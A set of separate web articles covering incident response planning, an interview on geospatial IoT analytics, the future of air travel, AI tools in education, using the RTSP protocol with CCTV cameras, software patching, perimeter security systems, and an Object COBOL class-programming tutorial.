Refinement After a security incident has been managed, it is important to continually improve and refine the incident response plan. Organisations should review and refine their incident response plan at least every six months or quarterly to ensure that it remains effective against evolving threats. Strategies to improve an incident response plan consist of: Conducting simulated incident scenarios Measuring performance metrics such as MTTD, MTTR, and MTTRw during exercises Focusing on primary attack scenarios Integrating elements such as preparation, threat identification, containment, and elimination. Choosing the Right Incident Response Framework Selecting the appropriate incident response framework is a critical element of handling cybersecurity incidents. The NIST Incident Response Framework offers advantages such as: Improved communication and decision making Enhanced security posture Prevention of reputation damage Systematic incident response Improved critical infrastructure All-time protection from cyber threats A comprehensive approach to handling security incidents When selecting from various incident response frameworks for a small business, it is crucial to consider guidance for: Eradication of incidents For large corporations, it is important to consider frameworks from reputable sources such as NIST, ISO, and ISACA. In conclusion, mastering the incident response lifecycle is crucial for organisations to effectively manage and mitigate cybersecurity incidents. From planning and preparation, through detection, containment, eradication, and recovery, to post-incident review and improvement, each stage plays a pivotal role in minimizing the impact of security breaches and maintaining business continuity. The choice of the right incident response framework, whether it’s NIST, SANS or any other, depends on an organisation’s specific needs and resources. With a well-defined lifecycle, proactive measures, regular training, and continuous improvement, organisations can stay ahead of evolving cyber threats and ensure the security of their digital assets. Frequently Asked Questions What are the 7 steps of incident response? The 7 steps of incident response are Preparation, Identification, Containment, Eradication, Recovery, Learning, and Re-testing. These steps offer a well-structured approach to managing cybersecurity threats effectively. Are you interested in learning more about the NIST incident response lifecycle? What is SANS SEC504? SANS SEC504 is a course that covers Hacker Tools, Techniques, and Incident Handling, providing skills for conducting incident response investigations and developing threat intelligence to mount effective defense strategies. It is fashioned as an introduction to the world of Penetration Testing and Incident Response. Why is having a well-defined incident response lifecycle important? Having a well-defined incident response lifecycle is important because it improves cybersecurity practices by providing a systematic framework for identifying and responding to security threats, reducing the impact of cyber incidents, and facilitating strategic detection and management of attacks. It helps organisations effectively handle security incidents and minimize their impact on operations. What are some effective strategies for containing a cybersecurity incident? The effective strategies for containing a cybersecurity incident include preparation, prompt identification, containment of incident activities and attackers, and subsequent eradication and recovery. What is the role of threat intelligence in the detection and analysis of security incidents? Threat intelligence plays a crucial role in enabling faster decision-making, reducing response times, and mitigating the impact of cyber incidents. It also aids in better understanding the threat landscape to enhance risk management.
<urn:uuid:346bbf57-db7f-4c13-b3e0-ad2c10a459fa>
CC-MAIN-2024-38
https://www.forensic-pathways.com/uncategorized/understanding-the-incident-response-lifecycle/
2024-09-20T17:10:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00460.warc.gz
en
0.921827
3,174
2.765625
3
According to your bio, the technology behind GeoSpock actually started as an attempt to build a supercomputer that could mimic a human brain – tell us about that. Way back before the company started, when I was doing my PhD at Cambridge, we were building a custom supercomputer architecture to carry out real-time simulation of human brain functions – trying to take the brain’s hundred billion neurons, a hundred trillion synapses, and compute it at the same rate of the brain does, which means everything must be updated every millisecond. At the time, approaches like nVidia’s graphics card solutions and IBM’s Blue Gene took a compute-centric view of the problem – which meant throwing more hardware at it. What the brain can do in one second, the state of the art was taking two weeks to execute. Our research group realized that it was a communication problem, so we designed a communication-centric supercomputer with custom vector processors using FPGAs, high speed serial links, and we were able to get the execution time down from two weeks to a single second, which is pretty cool. I realized that shipping custom hardware wasn’t a particularly scalable way to address the neuroscience problem. I set about making biologically-inspired massively parallel architectures run purely in a software environment on automatic systems using commodity standard server hardware. But the neuroscientists didn’t have a brain-scale model to stress test our machine with. We were probably two decades ahead of the market on that one. So how did you go from that to applying geospatial technology to things like IoT-generated data and smart cities? Around 2011-2012, I got very excited by the rise of smartphones and the fact that with every smartphone in our pocket, we will also have a GPS chip in our pocket. And then I started thinking about the future (or what the present is now) where it wouldn’t be just GPS in the devices that we carried, it would be in the devices that we drove – millions of connected cars – and the tens of millions of sensors in the physical environment allowing us to measure that environment. Many of those will be static sensors – they don’t necessarily have to have GPS chips, but the location still matters, because there’s no point putting a sensor in the environment if you have no context as to where it is. A temperature reading means nothing unless you can tell me where that temperature is. Imagine a connected vehicle driving through a city. As it’s moving, it is passing static sensors – IoT-connected streetlights, congestion-monitoring cameras, pollution monitors. A city that can dynamically manage congestion and street traffic needs knowledge of all the moving things and all the static things. So a static sensor still needs a location to give it context, maybe not for itself in isolation, but for the broader complete system. Anyway, geospatial systems were built around the use case of digitizing paper maps, not tracking billions of moving objects and giving each one of them contextual intelligence on demand in a second. I realized that by having all this knowledge of how you build custom supercomputers using commodity systems, part of the solution was there. So I decided to just go tackle it. To clarify, it seems you’ve got two problems to tackle there – not just tracking all those components, but the extreme amount of data they generate, right? Absolutely. By 2023, Gartner is predicting that we’re going to be generating 54 exabytes of IoT data a year. That’s more than the projected storage capacity that we’re going to manufacture. And they also predict that by 2035, we’re going to have a trillion connected IoT devices. The data that generates is going to be insanely large. And the biggest problem that we have in terms of data analytics is getting value from that data, especially in real time. Coming back to the congestion example, to monitor congestion, I need to know where every vehicle is in a city on a second-by-second basis. I need to know where they were over the past five minutes so I can see where congestion is emergent. I need to know historically whether that’s normal or unusual behaviour. And I need to be able to combine all of those things together in a second, because I need to know whether I can intervene to get better outcomes. The trouble with big data systems today when they’re reliant on the batch-processing model is that it may take two weeks to get an insight. So it’s always after-the-fact insights. And better luck next time, because when you measure the physical world, the likelihood of that scenario ever occurring exactly the same way again is close to zero. So our thing is to use geospatial data to enable people to understand contextual intelligence on the fly, in real time. And from that base point, then you can do AI modeling of future scenarios and then choose the one that you most want the world to look like so you can intervene and change the outcome for the better. And this is where we start getting into really intelligent city platforms, intelligent automated platforms, intelligent maritime platforms, things that can change the outcome and not just say, ‘Well, I should do it better next time.’ Also, our big thing is that we’re really good at de-siloing data. So when we go into a city – let’s use Cambridge as an example, because our headquarters is there – they have 86 different types of IoT sensors, connected buses, connected bus stops, smart streetlights, smart traffic lights, connected rubbish bins, microclimate, pollution sensors, ANPR [automatic number-plate recognition] cameras, Bluetooth flow control, all sorts. All of it is siloed, so it’s not very easy to draw new insights. We went in with our geospatial data platform, and we were able to de-silo that data, bring it home to one place, store it on AWS, then open that up for a programmatic API. And using SQL, we were able to basically turn that city into an innovation platform, so anyone can come along with a new question and just focus on extracting the value. Our ability to produce real-time value extraction – because we operate in seconds, not weeks – means you can ask new questions on the fly, unknown questions, and have them come back really quickly. So you’re actually doing all this on AWS – in the public cloud? Absolutely. We partner with AWS. We have dynamically scalable compute, and it’s really low-end compute, which allows us to just completely change the unit economics of these big data queries. And because we’re on AWS, we send our software to where the data is – shipping exabytes of data around for every new use case is expensive. So if they already have their data, we send our algorithms to where the data is, index it, and then open it up. The thing that’s going to scale the most is data, so we scale data the cheapest way possible: on S3. And the compute is right-sized, depending on the complexity of the question you’re asking. So the more complex the question, the more machines you spin up. So you can always get an answer in a second. What are some of the most interesting or unexpected insights that you have gathered from working with Cambridge, Singapore and other cities? With smart cities, we’re seeing a really big push in measuring automotive pollution output. However, 90% of the world’s global trade is maritime, and yet those engines are the big polluters as well. We’re working with maritime as well, so actually being able to track that and combine that data with city data, we can suddenly start understanding where is the pollution coming from, who’s causing it, and can we actually address those issues to help prevent climate change? Our data platform separates the data production and the sensors to help bring it into one platform, then enable a million next-generation citizen services, city insights or new commercial opportunities, new services, applications. So now we’re seeing this aggregation between application and data generation for the first time – data being repurposed. And that’s actually a bigger thing – in the past, no one had the ability to do universal insight extraction, so they were focused on data sharing and data selling. We can’t do that anymore – the data is too big. We have to get the insights where the data is being produced, and that’s what our technology allows. So, people can move away from a data-sharing model to an insight-sharing model, and that’s actually a lot better. If you’re an automotive manufacturer gathering an exabyte of data, you can’t sell that to every city that you operate in – they don’t know what to do with it. What they want to know is, is my road congested? That’s a yes or no question if you can solve it in real time, right? So we shift the model to insights rather than data. People are much more willing to share insights – it helps protect privacy and allows commercially sensitive data to remain in a secure environment. Moore’s Law is going to come to an end at some point, so the amount of power required to crunch these huge amounts of data is going to be an issue. Do you think quantum computing is going to be the answer to that? My take on quantum computing is that it produces a probabilistic output – you still have to take the output and put it into a conventional system. I see it as a bolt-on capability to the traditional compute model. So just like you have CPUs, GPUs and FPGAs, and now people are talking about neural processing units, you’ll have quantum processing units. I don’t think the framework of computation will be changed. I think it will be augmented with quantum. And quantum doesn’t solve the data storage issue. However, the advent of solid state technology is allowing us to store vast amounts of data more effectively than a traditional magnetic storage medium like spinning disks, and actually making that data faster. You still have the issues of how I manage that data – where do I put it? How do I still get maximum performance in terms of data extraction? But there are advances. If we look at NVMe (non-volatile memory express) technology, which is flash-based storage, I see that as the next wave.
<urn:uuid:9c328f40-4830-4db3-8403-96c573e01d24>
CC-MAIN-2024-38
https://www.frontier-enterprise.com/extreme-scale-data-needs-an-extreme-scale-brain/
2024-09-09T18:51:55Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00560.warc.gz
en
0.951849
2,214
2.59375
3
What will air travel look like in 2035 and beyond? Learn more about the latest trends in the aviation industry and how your flying experience will change over the next few decades. Air travel has a reputation for being cramped, uncomfortable, and expensive, particularly at peak times. It’s also a major contributor to the greenhouse gas emissions that cause climate change. But major changes to air travel are in development, so hopefully, in the next few decades, traveling by plane will get more affordable, more comfortable, and more environmentally friendly. Here are some of the ways the future of air travel is expected to change: 1. Hydrogen-powered planes. Aviation is currently responsible for 3.6% of the EU's greenhouse gas emissions due to the fact that modern planes use kerosene as fuel. A recent report suggested that hydrogen-powered planes could enter the market as soon as 2035, and those planes could carry hundreds more passengers per flight than traditional planes, with a cleaner energy source. 2. Going beyond traditional wing design. A blended wing design combines the wing and the fuselage into a single unit, so the entire aircraft provides the lift for the flight. Delta wings – like those used on the Concorde and high-speed military jets – may also be incorporated in some way into commercial planes. KLM is also working with Delft University of Technology on a ‘Flying V’ plane that has passenger cabins down each side of a v-shaped aircraft. The company claims this type of plane could offer 20% more fuel efficiency than the A350. 3. Futuristic cabin design. Airlines are constantly looking for ways to maximize the number of people they can put on each flight without sacrificing the comfort of the passengers. In the future, we may see improvements such as double-decker economy seats that promise more space for riders, paired with increased capacity for the airline. 4. Air taxis. Have you been longing to ride in a flying car that feels like it’s straight from Back to the Future or the Jetsons? Aviation companies are researching ways to shift local transportation from the road to the air with electrically-powered “air taxis” for short flights. In 2017, Volocopter completed their maiden flight for electrified individual air transport, and the Lilium Jet from Munich is reported to be able to fly 300km for an hour. Their five-seater air taxi could start operating as early as 2025, and traveling by air taxi could be as common as traveling by subway is in major cities today. Autonomous air taxis may follow shortly after as technology continues to evolve. 5. The return of supersonic flights. United plans to buy 15 new supersonic airliners, and hopes to "return supersonic speeds to aviation" by the year 2029. Previous supersonic passenger flights ended in 2003 when British Airways and Air France retired the Concorde. The definition of supersonic flight is when an aircraft travels faster than the speed of sound, which is approximately 660mph (1,060km/h) if the plane is traveling at an altitude of 60,000ft (18,300m). 6. Better in-flight entertainment. In-flight entertainment options of the future will include more screens, more gaming, and even the ability to take e-courses during your flight. Panasonic is also developing ways for passengers to improve wellness on flights by setting up lighting to regulate circadian rhythms on long-haul flights and dampening cabin noise to promote better sleep. VR and AR companies are also anxious to give travelers more immersive experiences on flights. Alaska Airlines and British Airways have trialed SkyLight’s VR headsets in first-class cabins on selected routes. As the development of the metaverse continues, we'll likely see more opportunities for passengers to enjoy immersive experiences while flying.
<urn:uuid:4e34ed9e-8dba-4dbd-823f-afd367a19fba>
CC-MAIN-2024-38
https://bernardmarr.com/what-is-the-future-of-air-travel/
2024-09-14T18:18:50Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00160.warc.gz
en
0.951965
799
2.859375
3
The realm of education is experiencing a significant transformation, spearheaded by the integration of Artificial Intelligence (AI). Cutting-edge tools and applications are redefining how students learn and how educators teach. The crux of this progressive change rests on AI-driven applications that are designed to elevate the educational experience across various academic fields. From virtual assistants to interactive platforms, AI is not just an auxiliary force but a central feature in crafting an efficient and personalized educational journey for learners around the globe. The benefits of these technological innovations are twofold: they streamline educative practices for efficacy and adapt individually to enhance the learning curve. As a result, the educational landscape is witnessing a bespoke evolution, one where technology is no longer just an add-on but a pivotal element in advancing modern education. Personalized Assistance for Students and Educators ChatGPT: The AI Study Companion ChatGPT is not just another study tool; it’s a virtual assistant that is revolutionizing the way students compile study materials and interact with content. Developed by OpenAI, this sophisticated tool uses AI to respond to user queries in real-time, thereby acting as a round-the-clock study partner. With ChatGPT, students can navigate through complex concepts with ease and draft essays with an efficiency that couldn’t have been imagined a decade ago. DataBot: Enhancing Cognitive Skills AI is not only about providing answers; it’s also about fostering a deeper understanding. DataBot serves as a digital buddy that hones logical reasoning and fortifies memory. This unique tool employs AI to present information in a way that pushes students to think critically and remember effectively. In a world brimming with data, having an ally like DataBot ensures that students are not just consuming information but engaging with it meaningfully. AI-Powered Learning and Evaluation Formative AI: Tailoring Teaching Methods Capturing the pulse of a classroom has always been a challenge, but Formative AI is changing the game. This innovative application illustrates AI’s role in formative assessment by analyzing student performances and thereby helping educators curate customized teaching methods. It provides actionable insights that allow for a teaching approach that adapts to the proficiency and pace of each learner – a personalized educational experience that students of the past could only wish for. Gradescope: Intelligent Grading Systems The traditional grading system is undergoing a makeover with Gradescope. Using AI, it offers a grading mechanism that caters to a broad spectrum of subjects, easing the burden on educators and ensuring consistency and accuracy in evaluation. This platform exemplifies AI’s potential to streamline processes that once consumed hours of an educator’s day, thereby providing them with more time to focus on what truly matters: teaching. Tools for Writing and Presentations Grammarly: Advancing Communication Skills Grammarly emerges as a standout in the suite of AI tools by automating the correction and enhancement of written works. By providing real-time suggestions on grammar, punctuation, and style, it empowers users to elevate their writing. Beyond just corrections, Grammarly also educates by expanding the user’s vocabulary – invaluable for students and professionals alike, ensuring clarity and fluency in written communication. PowerPoint Speaker Coach: Refining Presentation Skills For those who present, whether a student or a corporate professional, PowerPoint Speaker Coach is indispensable. Through AI, the Speaker Coach offers feedback on speaking pace and tone, prerequisites for powerful presentation delivery. This level of optimization is unheard of in traditional public speaking practice and could be the difference between a good presentation and a great one. Interactive Learning Platforms Quizlet and Socratic: Engaging Educational Ecosystems Quizlet and Socratic are leading the way as interactive learning platforms, offering a rich and engaging educational ecosystem. They use AI to provide a tailored learning experience, with tools for creating study sets and quizzes in Quizlet and a student-driven assistant in Socratic that answers questions and explains concepts. These platforms are making study sessions more interactive and reinforcing knowledge through the power of repetition and active engagement.
<urn:uuid:3a077a13-3732-4aed-a28d-d47013b3b3e2>
CC-MAIN-2024-38
https://educationcurated.com/online-learning/10-ai-tools-revolutionizing-education-technolgy/
2024-09-14T16:41:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00160.warc.gz
en
0.925308
852
3.40625
3
The RTSP protocol can be used to transmit images on CCTV systems and due to its compatibility with several devices, it is a great option for hybrid projects. In this article, you will learn what the RTSP protocol is and how to use it for an IP camera, digital recorder (DVR) or network recorder (NVR). What is the RTSP protocol? RSTP is an acronym for "Real Time Streaming Protocol", meaning it was designed to send audio or video live from one device to another. This protocol was not created exclusively for CCTV, it was already used in other sectors where there is a need for real-time transmission and was adopted by video surveillance device manufacturers and became a standard protocol. The RTSP protocol for CCTV Video surveillance manufacturers implement the RTSP protocol on their cameras, recorders, and software so that they are compatible with other devices that are available in the market. When purchasing an IP camera and a video network recorder from different manufacturers, you can have them communicate using this universal protocol. To configure the equipment it is necessary to find out which RTSP command is to be used and this information can be found in the product's manual or by consulting the technical support team. How to use the RTSP protocol Imagine that you have purchased an IP camera from Dahua (a Chinese manufacturer) and want to use it with a network recorder (NVR) that you already own, but it is from a different manufacturer, such as Samsung. You should search the Dahua's camera manual for the RTSP command that should be used to stream video over the network. If you do not find this information in the product's manual you should contact the manufacturer technical support team as it is essential that you get the correct command so your equipment can communicate with each other. After obtaining this information, you must insert it into the recorder which will initiate a request to send video through this universal protocol. In practice, just open the NVR menu and input the RTSP command followed by the username and password of the IP camera and upon receiving this information the camera will send a real-time video stream. How to use the RTSP protocol for cloud recording The principle for video recording in the cloud is the same, just use the correct RTSP command to request the camera to send the video to the server that is located somewhere on the Internet. The diagram below shows a IP camera that is installed on an internal network and it is connected to a router. You just need to set up the cloud recording server to send the RTSP command over the Internet and as soon as it is received by the camera it starts video streaming. In this example, the server simply sends the RTSP command over the Internet and upon reaching the external interface of the router it routes to the internal network where the camera is located. Therefore, it is necessary to configure the router and input the routing rules that are based on the network interfaces and communication ports. How to Test an IP Camera with the RTSP Protocol Before trying to set up a CCTV system it is interesting to make sure everything will work properly and the best way to do this is through simple tests like connecting an IP camera with a traditional software that uses the RTSP protocol. There is a traditional free software called VLC that can be used for such tests. The diagram below shows an example of how to use it. In this example, an IP camera is connected to the router which in turn is connected to the laptop that uses the VLC software to send the RTSP command to the camera. Everything is on the local network and therefore there is no need for routing rules (the devices are attached to the internal ports). In the VLC software, just open the "Media> Open Network Stream" menu or type CTRL + N and paste the RTSP command from the IP camera. In our example, the IP of the camera is 192.168.2.107 and the RTSP port is 554, this information must be entered in the command that will be sent to the camera. See the example in the image below: The command in this case is: After sending the command you can see the image of the IP camera directly on the laptop, which proves that the command used is correct and the network connections and IPs are also correct. After this initial test it is possible to move on to more advanced tests and use a remote connection with IP camera recorders or cloud recording systems. A practical example of using the RTSP protocol via the cloud Let's talk about a practical example of using the RTSP protocol for CCTV. Imagine a situation where you have some analog security cameras connected to a digital recorder (DVR) and your intention is to have redundant video recordings. You just need to choose a service that allows you to store everything on a server in the cloud (somewhere in the Internet). In this example I will use the services of Angelcam that works with different device brands and also work well with the RTSP protocol. ==> For more details, I recommend reading the other article: CCTV camera cloud recording: Using online IP camera storage Configuring the router to work with the cloud Before doing the tests with the command in the cloud, it is necessary to configure the router, this procedure is extremely simple, just use the IP information and port of the IP camera. Basically, you have to inform the router that it should direct traffic coming from the Internet to the IP camera whenever the request is to a particular logical port which in the case of the RTSP protocol is by default the 554 . See the image below that shows the configuration of the router, note that the configuration for this model must be made in the "Applications and games" menu the IP camera address is 192.168.2.107 and the port is 554. Obviously you will have to look for other menus in different models of routers, usually you find this menu as port forwarding, port forwarding or NAT. How to configure the cloud server Dahua DVR can work seamlessly with this service because it allows the use of RTSP command and the information we need for configuration is available in the product's manual. In this specific case, the device is a 4-channel Dahua DVR that uses the following RTSP command: Just use this command and replace the IP, port, user and password information and that's it, everything will work according to your network. Everything must be configured on the server side of the cloud and the routing rules must be ready on the router that is on your local network. See in the following image an example of how to configure the Angelcam's cloud. After creating a platform account in the site https://angelcam.com login with the user and password and choose the option DVR and NVR. After this step simply type or paste the RTSP command as shown in the following image Note that the command used includes the external IP used by the router and the 554 port that was used in the router configuration and which is the DVR standard. It is important to understand the concept, the RTSP command sent by the cloud server arrives at the router through the external interface before being routed according to established rules and therefore, you must make sure which is the external IP of the used by the router. The following image shows the end result of the camera connection to the server in the cloud. In some cases you will notice that the image may suffer some quality variations due to some factors such as lack of Internet link stability, available bandwidth reduction or incompatibility of commands between the cloud server or camera. Be sure to upgrade the IP camera firmware to the latest version available, this helps maintain compatibility with systems that use RTSP as cloud services and other brand recorders. If you do not have a static IP on your Internet link If you do not have a static IP on your Internet link, you can use a DDNS service available on the Internet, so the cloud service will continue to work and record the images from your camera even when there was an automatic change of the external IP of your router. How to find your IP camera's RTSP command The simplest way to find the command used by your camera or recorder is to consult the product's manual, if this is not possible contact your equipment supplier, if you still have problems you may try to use the ONVIF DEVICE MANAGER software following the instructions from the article ONVIF Device Manager Review and Download (Test IP Cameras) Now you already know what the RTSP protocol is and how you can do the tests and use it in practical situations. I recommend that you run local tests with the VLC software and the devices you have on your network to familiarize yourself with the use of this protocol Want to learn more ? If you want to become a professional CCTV installer or designer, take a look at the material available in the blog. Just click the links below: Please share this information with your friends...
<urn:uuid:4b254d79-f878-4db5-8eec-4189aca6bad3>
CC-MAIN-2024-38
https://learncctv.com/what-is-rtsp-protocol-for-ip-cameras/
2024-09-15T23:16:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00060.warc.gz
en
0.932282
1,859
3.1875
3
According to TechTarget, a software patch is a “quick-repair job for a piece of programming designed to resolve functionality issues, improve security and add new features.” Although similar to a hotfix, which users can apply without having to restart their software, a software patch updates a small component of the software to fix a bug or error discovered after the product launch. As I’m sure you already know, there is no such thing as a perfect software program, therefore patches are very common, even many years after a program has been launched. The more popular a program is, the more probably rare problems occur, and so some of the most popular programs are some of the most patched. So, we can say that a patch, commonly known as a fix, is a small piece of software that is used to redress a problem, generally called a bug, or an error, within an operating system or software program. Do You Need to Install Software Patches? Although the main purpose of a software patch is to fix bugs, it can also address security vulnerabilities and instabilities in a software piece. Turning a blind eye to these crucial updates can leave your devices open to malware attacks that the patch is intended to prevent. Some patches aren’t so critical but still important, adding new features or pushing updates to hardware drivers. So, to make it clear, avoiding patches will leave the software outdated, at a greater risk of attacks, and most likely incompatible with newer devices and software. What’s more, a software patch is extremely important as it confronts known vulnerabilities. When a vendor releases a security update, it alerts the hacker community that there’s a vulnerability in that particular software. At that moment, attackers begin looking for unpatched copies of the software to exploit it. Luckily for you, our Heimdal Patch & Asset Management ensures that hackers don’t use these vulnerabilities to break into your corporate network. The sooner your organization installs the security patch, the more quickly it can protect itself against the associated vulnerability. The Importance of Patch Management It’s also essential for both users and organizations to implement patch management. What is patch management? As previously explained in my colleague’s patch management overview, it is a procedure that plays a significant role in ensuring strong organizational protection. For most users and their devices, effective patch management can be as simple as enabling automatic updates. Nowadays, more and more organizations have implemented patch management policies that decide how to estimate and use software patches. These policies usually set the time frame within which IT must apply the patch and how to check it to ensure it will not cause compatibility issues for the organization. So, why is it crucial to keep security patches up to date? #1. It reduces the risks of cyberattacks Most users perceive cyberattacks as an impossibility until they become a real threat. They feel like a cyberattack comes on the spur of the moment, without warning, but quite often, the best patch management software is available before cyber attackers exploit a vulnerability and manipulate it to infiltrate systems. #2. It avoids the loss of productivity It may seem unexpected, but another consequence of cyberattacks is the productivity loss that arises from system recess. To this extent, a cyberattack can result in two types of monetary losses — the cost of patching systems and the cost of delayed projects and unproductive employees. #3 It protects your data Never underestimate the value of the data stored on your devices. Hackers can and will use personal information to gain access to as many systems as possible, especially if they obtain login information from someone who uses the same credentials for more services. #4 It protects customer data Business owners are responsible for safeguarding the information users entrust to their systems. Companies that fail to live up this standard can face severe consequences. Let us remember the case of Equifax, which the Federal Trade Commission has ordered to provide $125 or 10 years of free credit monitoring for having exposed the personal information of 147 million people back in 2017. #5 It protects others on your network A virus infiltrated into a computer network can quickly spread to auxiliary devices that are connected to your network. Thus, one unpatched system or incautious user can trigger severe consequences to a whole network of systems. If you’re still not convinced of the importance of security patches, maybe you should read down-to-earth software patching advice from 15 top cybersecurity experts to make software updates and patches part of your digital routine. If they won’t persuade you to take great care of your online data, probably no one else will. Automate your patch management routine. Heimdal® Patch & Asset Management Software Remotely and automatically install Windows, Linux and 3rd party application updates and manage your software inventory. - Schedule updates at your convenience; - See any software assets in inventory; - Global deployment and LAN P2P; - And much more than we can fit in here... Wrapping it up… Software patches are among the most critical tools users and organizations have for adequate cybersecurity. I can assure you that a fully updated system is one of the best defenses against vulnerabilities. Keep in mind that it’s always a smart choice to enable automatic updates for your OS and applications. If you’re a manager of larger networks, you have a bit more work to do to keep your systems patched with the latest updates. You must pay close attention to the network’s needs, decreasing or clearing downtime for critical systems. You will need to implement software patch management best practices, test them appropriately and cautiously establish any potential impacts they may have.
<urn:uuid:bb76793e-70db-40e0-9524-4f62f5dfc974>
CC-MAIN-2024-38
https://heimdalsecurity.com/blog/what-is-a-software-patch/
2024-09-20T19:55:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00560.warc.gz
en
0.934663
1,168
2.9375
3
Perimeter security plays a vital role in safeguarding buildings, campuses, and critical infrastructure against unauthorized access and potential threats. While physical barriers like fences and gates form the foundation of perimeter security, the integration of active perimeter security devices is crucial. These devices empower security teams to detect, analyze, and respond swiftly to any intrusion or suspicious activities, enhancing overall site and building security. Understanding Perimeter Security: A Brief Overview Perimeter security encompasses a range of solutions designed to create a robust defense system. A comprehensive perimeter security solution should include security video cameras, perimeter lighting, motion sensors, alarm systems, intrusion detection systems, and perimeter access control systems. It is essential for businesses to consider both indoor and outdoor perimeter security systems for comprehensive protection. Types of Perimeter Protection Devices - Perimeter Security Cameras: These strategically positioned cameras monitor vulnerable areas, analyze recorded video footage, and detect suspicious activities. Clear imaging, even in low-light conditions, is vital for effective surveillance. - Perimeter Access Control: Access control systems verify the identity of employees and visitors, enabling secure entry via perimeter doors or gates. Modern cloud-based access control systems provide remote management capabilities, enhancing convenience and security. - Security Perimeter Sensors: Sensors placed near entrances and fences detect movements and disturbances, alerting security teams to potential intrusions. Various sensor types, such as motion sensors and vibration sensors, serve specific purposes in enhancing security. - Perimeter Alarm Systems: These systems work in tandem with security sensors to alert security teams to activities that require investigation. Alarms can be transmitted through hard-wired links or the internet for rapid response. - Physical Barriers: Walls, fences, gates, doors, and barriers create a physical perimeter protection system, deterring intruders and ensuring only authorized personnel gain entry. Building an Effective Perimeter Protection Strategy An integrated perimeter security strategy combines physical barriers with advanced security technologies and skilled security personnel. Key processes include deterrence, detection, assessment, response, communication, recording, and analysis. By integrating these processes, businesses can create a robust defense against threats. Benefits of a Complete Perimeter Security Solution Implementing a comprehensive perimeter security solution offers several advantages: - Reduction in Intrusions: Restricts unauthorized access, ensuring only authorized individuals and vehicles enter the site. - Increased Situational Awareness: Provides a 360-degree view of perimeter and site activities, enabling swift response to incidents. - Faster Incident Response: Accurate notifications and high-speed network capabilities facilitate rapid assessment and response to security incidents. - Greater Protection: Enhances security, safeguarding facilities, assets, and people on-site. Planning Your Perimeter Security System Designing an effective perimeter security system requires a tailored approach. Conducting a physical security risk assessment, site survey, and selecting appropriate equipment based on performance and reliability are crucial steps. Collaborating with professional security system specialists can provide expert advice, ensuring a robust and customized perimeter security solution for your business.
<urn:uuid:c11b5402-cae9-4606-b567-9b8648289658>
CC-MAIN-2024-38
https://maxxess-systems.com/2023/11/fortify-your-perimeter-a-comprehensive-security-system-selection/
2024-09-08T15:59:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00824.warc.gz
en
0.885026
612
2.640625
3
Objects and Messages Tutorial | Inheritance Tutorial | In the Objects and Messages Tutorial you learned how to create instances of a class and send messages. In this chapter you will learn how to write classes for objects of your own, using the example Stopwatch class introduced in the Objects and Messages Tutorial. The first part of the discussion looks at the way a class program is built up, using relatively little syntax which is different from ANSI 85 COBOL. It is followed by sections in which you animate through the Stopwatch code. This tutorial consists of the following sessions: Time to complete: 45 minutes. This tutorial starts with a look at the overall structure of a class program, using the Editor to examine the structure of Stopwatch. The class program consists of a set of nested programs. Nesting programs is a concept which was introduced to COBOL in the ANSI 85 standard. The sections below examine the following elements of the class program: To load Stopwatch into the Editor: As you read the explanations in the following sections, use the editor to locate and examine the code in stopwtch.cbl. Each class program starts with a class-id finishes with an end class clause. These bracket the outermost level of the nesting. The Stopwatch class looks like this: class-id. Stopwatch data is protected inherits from Base. ... end class Stopwatch. The inherits from phrase identifies Stopwatch's superclass, Base. The data is protected phrase enables any subclasses of Stopwatch to inherit Stopwatch data. If this clause is omitted, or replaced by data is private , subclasses of Stopwatch cannot access inherited data directly. Inheritance of data is explained in more detail in the To see this code: paragraph identifies the executable code files which implement classes used by the program. The superclass, the class itself, and every class which will be invoked from the class must be identified To see the class-control paragraph for Stopwatch directly below tag S005. Scroll down the text edit pane until you get to the class-control paragraph, located below tag S005. paragraph looks like this: class-control. Base is class "base" StopWatch is class "stopwtch" . The is class clause serves two purposes: On Object COBOL for UNIX, a class is guaranteed to be loaded before the class object receives its first message. Usually this occurs when you send the first message to the class object, but before the class object receives it. This is the same behavior as Object COBOL on NetExpress. The class object program defines the data and methods for the class object. It is nested within the class program, immediately following the class program data division (if there is one). It looks like this: class-object. object-storage section. * class data . ... * class methods end class-object. The Object-Storage Section defines the class object data. The class object data can only be accessed from the class methods. It can also be inherited for direct access by subclasses (this depends on the contents of the Class-Id paragraph). Each class method is a nested program. The code below shows an outline for a "new" method for Stopwatch. method-id. "new". ... linkage section. 01 lnkWatch object reference. procedure division returning lnkWatch. * code to create and initialize a Stopwatch object. exit method. end method "new". As with the class program itself, you can declare different types of data in the Data Division of the method. The DATA DIVISION header itself is optional. Data declared here is only accessible to the code in this method. The data division can contain any of the following sections: Variables used by the method for processing. Data in working-storage is never reinitialized between different invocations of the method. This Working-Storage data is also shared between all instances of the object - you can't rely on it not being overwritten by a different instance between invocations. Variables needed to support recursive working by the method. When a method is called recursively, new local-storage data is created for each level of recursion. You have to initialize the data items within the method code; although VALUE clauses in Local-Storage are accepted by the Compiler, they have no effect at run-time. Variables passed as parameters to and from the program. The Procedure Division contains the code for the method. You terminate processing of the method with an EXIT METHOD statement. This returns processing to the program which invoked the method. To see the "new" method This method uses a Linkage Section to return data from the method. The object program defines the data and methods for instances of the class. It is nested within the class program. It looks like this: object. object-storage section. * instance data for the object. ... * Instance methods end object. The only Data Division section that has any meaning in an object program is the Object-Storage Section. You can create other data sections, but the run-time behavior if you try to access the data in these sections is undefined. Any data you declare in the Object-Storage Section is accessible to all the instance methods, and may be inherited by instances of subclasses of the class. There is no Procedure Division in an object program, only methods. To write an initialization method for instances, write a method called "initialize", and then invoke it from the "new" method for the class after you have created an instance. To see the object program and data declarations paragraph for Stopwatch The OBJECT header and Object-Storage Sections are located below tags B009 and B010. Instance methods are nested inside the object program. Writing an 